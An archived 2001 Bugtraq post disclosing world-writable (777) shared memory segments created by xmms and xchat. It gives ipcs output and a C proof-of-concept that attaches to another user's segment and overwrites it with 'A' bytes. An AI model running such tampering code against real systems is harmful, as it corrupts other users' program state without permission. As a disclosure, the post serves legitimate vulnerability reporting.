Bugtraq mailing list archives

xmms/xchat full access shared memory segments


From: Julien VANEGUE <vanegu_j () epita fr>
Date: Sat, 3 Nov 2001 12:22:23 +0200


On Slackware 8:

bash-2.05$ ipcs -m

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status      
0x00000000 4216960    mayhem    777        196608     2          dest         
0x00000000 7636737    mayhem    777        196608     2          dest         

bash-2.05$ ipcs -p -m

------ Shared Memory Creator/Last-op --------
shmid      owner      cpid       lpid      
4216960    mayhem     3921       1406      
7636737    mayhem     26206      26209     

bash-2.05$ cat /proc/3921/cmdline ; echo
/opt/gnome/bin/xmms
bash-2.05$ cat /proc/26206/cmdline ; echo
/opt/gnome/bin/xchat
bash-2.05$ 



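This does not seem to be exploitable (no fault), but it still needs to be fixed: with perms 777, any local user can attach to these segments and read or overwrite their contents.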

/*
** test_shm.c
** 
** Made by Julien Vanegue
** Login   <mayhem () hert org>
*/
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


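/*
** Report the failed call named by str through perror() and terminate
** with exit(-1). The body is wrapped in do { } while (0) so that
** "FATAL(x);" expands to exactly one statement and stays valid inside
** an unbraced if/else.
*/
#define FATAL(str) do { perror(str); exit(-1); } while (0)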


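/*
** Print the command-line syntax on stderr and terminate with exit(-1).
** The first argument is passed to shmat() by main(), so it is a shared
** memory id (as listed by "ipcs -m"), not a semaphore id; the second
** is the number of bytes main() writes.
*/
void    usage(void)
{
  fprintf(stderr, "syntax: a.out shmid size \n");
  exit(-1);
}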


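/*
** Parse a non-negative decimal integer from a command-line argument.
** Returns 0 and stores the value in *out on success, -1 when the text
** is empty, has trailing characters, is negative or is out of range.
*/
static int      parse_arg(const char *s, long *out)
{
  char  *end;
  long  v;

  errno = 0;
  v = strtol(s, &end, 10);
  if (end == s || *end != '\0' || errno == ERANGE || v < 0)
    return (-1);
  *out = v;
  return (0);
}


/*
** Attach to the System V shared memory segment whose id is argv[1] and
** fill its first argv[2] bytes with 'A', to check whether the calling
** user is allowed to write to that segment.
**
** Both arguments are validated, and the requested size is checked
** against the segment size reported by shmctl(IPC_STAT) so the write
** never runs past the end of the mapping. Exits with -1 on any error
** and returns 0 once the segment has been written and detached.
*/
int     main(int argc, char **argv)
{
  struct shmid_ds       ds;
  long                  id;
  long                  size;
  char                  *addr;

  if (argc != 3)
    usage();
  /* atoi() would silently turn garbage or negative input into an id or size */
  if (parse_arg(argv[1], &id) < 0 || id > INT_MAX
      || parse_arg(argv[2], &size) < 0)
    usage();
  if (shmctl((int) id, IPC_STAT, &ds) == -1)
    FATAL("shmctl");
  if ((size_t) size > ds.shm_segsz)
    {
      fprintf(stderr, "size %ld exceeds segment size %lu\n",
              size, (unsigned long) ds.shm_segsz);
      exit(-1);
    }
  if ((addr = shmat((int) id, NULL, 0)) == (void *) -1)
    FATAL("shmat");
  memset(addr, 'A', (size_t) size);
  /* keep the segment attached briefly so the attach shows up in "ipcs -m" */
  sleep(2);
  if (shmdt(addr) == -1)
    FATAL("shmdt");
  return (0);
}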

